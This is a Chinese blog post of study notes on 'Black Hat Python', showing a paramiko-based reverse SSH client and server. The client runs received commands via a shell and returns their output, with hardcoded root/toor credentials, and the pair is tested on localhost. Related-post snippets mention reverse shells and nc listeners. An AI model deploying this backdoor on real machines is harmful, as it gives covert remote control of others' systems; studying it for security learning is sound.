python黑帽子学习笔记(二)——反向ssh

最新推荐文章于 2022-10-29 16:50:10 发布
最新推荐文章于 2022-10-29 16:50:10 发布
阅读量694 收藏 1
点赞数 1
分类专栏: python学习 文章标签: python 黑客
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40909772/article/details/83217135
版权

1.反向ssh。
通常情况下,在使用SSH的时候,你可以使用SSH客户端连接SSH服务器,但是由于Windows本身不一定装有SSH服务端,所以我们需要反向将命令从SSH服务端发送给SSH客户端。
2.代码。

#!/usr/bin/python
# -*- coding: UTF-8 -*-
import threading
import paramiko
import subprocess
def ssh_command(ip,user,passwd,command):
    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    client.connect(ip, username=user, password=passwd)
    ssh_session = client.get_transport().open_session()
    if ssh_session.active:
        ssh_session.send(command)
        print(ssh_session.recv(1024))
        while True:
            command = ssh_session.recv(1024)        #ssh服务器获取命令
            try:                                                              # 异常处理当try语句没问题时执行try语句反之跳转至except语句
                cmd_output = subprocess.check_output(command,shell=True)
                ssh_session.send(cmd_output)         #向服务器发送命令执行的结果
            except Exception,e:                                  
                ssh_session.send(str(e))
        client.close()
    return
ssh_command('127.0.0.1','root','toor','ClientConnected')

最初的几行代码和上一篇的SSH客户端类似,从while Ture:开始出现新的内容!
接下来我们来创建SSH服务器。

#!/usr/bin/python
# -*- coding: UTF-8 -*-
import socket
import paramiko
import threading
import sys
 
# 使用 Paramiko示例文件的密钥
host_key = paramiko.RSAKey(filename='C:\Users\lenovo\.ssh\id_rsa') #你获取的密钥所在的路径
 
class Server(paramiko.ServerInterface):
    def __init__(self):
        self.event = threading.Event()
    def check_channel_request(self, kind, chanid):
        if kind == 'session':
            return paramiko.OPEN_SUCCEEDED
        return paramiko.OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED
    def check_auth_password(self, username, password):
        if (username == 'root') and (password == 'toor'):
            return paramiko.AUTH_SUCCESSFUL
        return paramiko.AUTH_FAILED
 
server = sys.argv[1]
ssh_port = int(sys.argv[2])
try:
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)    #TCP socket
    #这里value设置为1,表示将SO_REUSEADDR标记为TRUE,操作系统会在服务器socket被关闭或服务器进程终止后马上释放该服务器的端口,否则操作系统会保留几分钟该端口。
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.bind((server, ssh_port))   #绑定ip和端口
    sock.listen(100)    #最大连接数为100
    print '[+] Listening for connection ...'
    client, addr = sock.accept()
except Exception, e:
    print '[-] Listen failed: ' + str(e)
    sys.exit(1)
print '[+] Got a connection!'

try:
    bhSession = paramiko.Transport(client)
    bhSession.add_server_key(host_key)
    server = Server()
    try:
        bhSession.start_server(server=server)
    except paramiko.SSHException, x:
        print("[-] SSH negotiation failed.")
    chan = bhSession.accept(20)
    print("[+] Authenticated!")
    print(chan.recv(1024))
    chan.send("Welcome to bh_ssh")
    while True:
        try:
            command = raw_input("Enter command: ").strip('\n')
            if command != 'exit':
                chan.send(command)
                print(chan.recv(1024) + '\n')
            else:
                chan.send('exit')
                print("exiting")
        except KeyboardInterrupt:
                bhSession.close()
except Exception,e:
    print("[-] Caught exception:" + str(e))
    try:
        bhSession.close()
    except:
        pass
    sys.exit(1)

这个代码中我们使用了Paramiko实例文件包含的SSH密钥,在开启一个套接字监听,之后使用SSH管道并配置认证模式。当一个客户端认证并发回ClientConnected消息,我们输入到服务端的任何命令将发送给客户端并在客户端上执行,输出结果将返回给服务端。
PS:这里就如何获取获取密钥做一说明。你需要在cmd中运行以下命令,如图获取密钥。

ssh-keygen -t rsa

在这里插入图片描述
下面是在主机上的测试:
在这里插入图片描述
在这里插入图片描述
你可以看到首先我们运行了服务端,之后使用客户端连接。客户端连接成功后我们执行了一条命令。虽然客户端看不到任何情况但是执行命令的结果已经发送给服务端了!

晶晶娃在战斗
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Python 帽子学习笔记 - SSH 远程登录 - Day 11
信安工匠
04-01 646
学习 SSH 知识,碰到阮一峰大牛这段话,说得多好,去吧,找寻自己的路。 人的真正职责只有一个:找到自我。然后在心中坚守一生,全心全意,永不停息。 所有其它的路都是不完整的,是人的逃避方式,是对社会角色的懦弱伪装,是随波逐流,是对内心的恐惧。” SSH (SECURE SHELL) SSH 是一个种网络协议,用于计算机之间的加密登录、数据通信、执行命令、文件传输等。 SS...
Python编写实现SSH的反proxy Tunnel
11-11
Python编写实现SSH的反proxy Tunnel 具体描述可以看我的博客
python渗透测试入门之ssh反向shell
ailx10
06-03 206
近期收到了电子工业出版社赠送的一本网络安全书籍《python帽子》,书中一共24个实验,今天复现第3个实验(基于paramikoSSH通信),我的测试环境是mbp电脑+kali虚拟机+conda开发环境。其中mbp电脑充当C&C服务器,kali虚拟机充当受控主机,在mbp电脑上输入控制命令,在kali上接收到命令并执行,将执行结果再发给mbp电脑,于是我们在mbp电脑上获得kali虚拟...
python-帽子中文高清版书中源代码
11-13
python帽子,美版,中文,高清,亲测非常好用,放心下载
paramiko实现ssh的交互式连接
Liam_fang的博客
06-05 1万+
利用python3+实现,命名为interactive.pyimport socket import sys # windows does not have termios... try: import termios import tty has_termios = True except ImportError: has_termios = False def ...
python爬虫学习笔记)——解析内容
01-20
补充:在一些其他的教程中,发现也可以用urllib模块获取数据,urllib模块是python内置的一个http请求库,不需要额外的安装。只需要关注请求的链接,参数,提供了强大的解析。requests库则需格外安装,但是个人感觉...
Python学习笔记(六)——–Python函数
12-22
、定义一个Python函数 Python中以def开始定义函数,无需注明函数的返回值类型。 函数名后跟(),其中放入函数所需要的参数,同样的参数不需要注明类型。 函数体以冒号开始,并且首行按规定缩进。 函数第一行可以...
python学习笔记(五)——模块导入
12-22
是我们自己写的自定义的模块 三是其他地方提供的第三方模块 2、模块的导入 使用 import 导入 # 导入模块 import 模块名1,模块名2,... # 使用模块中的方法等 模块名.函数/类/全局变量 导入第三方 random 模块,...
Python学习笔记(五)——–Python迭代器
01-20
、迭代器特点 1.迭代器可以从集合的第一个数据开始访问数据,直到最后一个 2.迭代器只可向前访问,不能倒退(next()方法) 3.迭代器的两个基本方法:next()、iter() 三、Python中的迭代器 迭代器的两个基本方法:...
Python学习笔记——大数据之SPARK核心
02-24
本文来自于csdn,文章讲解RDD的特点,RDD操作函数相关,穿插案例辣酱得段子,带大家理解MapReduce,通过哈姆雷特单词分析案例进行深度剖析。RDD(ResilientDistributedDatasets弹性分布式数据集),是spark中最重要...
python反向连接shell,可穿透防火墙
07-30
python reverse_shell.py 反弹目的ip 3322 反弹目的ip 执行nc -l 3322 即可连结 被控端
[linux-010] 用pramiko保持反向登陆断网重启
大数据和机器学习研究
04-04 808
#!/usr/bin/env python3 #-*- coding:utf-8 -*- """ 如果偶尔断电或者断网,反向ssh会断开,然后再没有机会重连,只能过来手工重启,很麻烦。 因此,需要一个服务: 1.这个服务开机自动启动。切换到bri用户开始执行。 2.每5分钟,启动一个线程,执行如下操作: 2.1 先检查能否ping通so.com,如果能,表明网络正常,如果不能,不做操作。 ...
paramiko 自建代理服务ssh到内网服务器
weixin_45389126的博客
03-29 1365
paramiko 通过自建代理服务ssh到内网服务器 原理 在一台拥有公网IP的服务器建立代理服务,用户名为username,密码为password,端口为12237,那么就可以在本地通过这台服务器ssh到与之内网相同的服务器 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-XBLv5zSf-1617015758956)(C:\Users\wiwide\AppData\Roaming\Typora\typora-user-images\image-20210329185
干货:通过SSH反向隧道的方式配置Windows10远程3389端口
最新发布
惘嘫、冋渞的专栏
10-29 2114
前两个安装OpenSSH服务端没有成功,Windows10安装OpenSSH服务端报0x80072ee6错误,用了第三种方法手动安装的。经过测试,win10默认就安装了OpenSSH客户端,不需要安装OpenSSH服务端,如果客户端没有安装,请参考下文。设置完成后,回到“应用”>“应用和功能”和“可选功能”,你应会看到已列出 OpenSSH。打开“设置”,选择“应用”>“应用和功能”,然后选择“可选功能”。输入服务器密码,成功后,窗口如卡住一样,窗口可以不关闭。
Python帽子python3代码实现(第章)
快吃小蛋糕吧的博客
08-24 1383
Python帽子》代码实现 本篇笔记全部用python3实现,本人大一在校生第一次写博客,有错误之处希望大家积极指出。 参考大佬博客: https://www.cnblogs.com/zhangyuxiang666/p/11010581.html https://blog.csdn.net/qq_39038028/article/details/72860112 第章 网络基础: 创建Tcp客户端(tcpClient.py): 示例中引用了首先导入socket模块,使用socket()方法来创建套接字
python帽子学习笔记(三)—— ssh隧道
qq_40909772的博客
10-21 1058
1.SSH隧道。 SSH隧道是一个不可思议又难以理解和配置的技术方法,特别是在做反向SSH隧道的时候!关于SSH隧道的具体内容可以访问这个链接学习! https://www.ibm.com/developerworks/cn/linux/l-cn-sshforward/index.html 2.rforword.py工具。 paramiko库文件中包含了叫rforward.py的文件,他可以完美解...
关于《Python帽子黑客与渗透测试编程之道》的学习笔记
热门推荐
Mi1k7ea
05-04 1万+
本篇文章是学习Python帽子黑客与渗透测试编程之道》的笔记,会持续地将书上的代码自己敲一遍,从而让自己对Python的安全编程有更多的了解,同时希望各位可以给给建议,不足之处太多了。 第一章——设置Python环境: Kali Linux的安装就不说了,最近有更新为2017版的可以下载。 确认是否安装了正确的Python版本: 确认是2.7版本的即可。 接着安装P
ssh反向连接和简单实现
XXXX的专栏
08-19 3185
SSH反向连接的使用 1、什么是反向连接? 反向连接是指主机A(受控端)主动连接主机B(控制端),在主机A和主机B之间建立一个远程连接,通过这个连 接主机B可以主动的向主机A发送一些请求。 2、为什么需要主机A主动去连接主机B呢? 这是因为主机A在局域网内,如果没有对主机A进行端口映射,对于主机B来说主机A是不可见的,如果在主机B这 边向主机A发送连接请求,这个请求是不可达的。
Python帽子学习笔记
a1071159538的博客
07-02 4760
操作系统:kail32位 第章:网络编程    tcp(传输控制协议):面向连接,通讯时创造一条连接,提供顺序的可靠地,不重复的数据传输,不会被加上数据边界,每个发送的消息,可能会拆成很多份,每一份会不多不少的到达目的地,然后按照一定的顺序拼接起来,传给正在等待的应用程序   UDP:无连接,数据是整个发送,具有数据边界,数据到达的顺序、可靠性及不重复性无法保证 创建一个netc
Python学习笔记版:进阶指南
"Python学习笔记版" 这本《Python学习笔记版》是一本适合有一定编程基础的学习者使用的教材,作者通过个人的实践经验,详细记录了Python 2.7版本的相关知识。笔记内容涵盖了Python的基础语法、进阶特性以及...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

晶晶娃在战斗

你的鼓励将是我创作的最大动力!

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值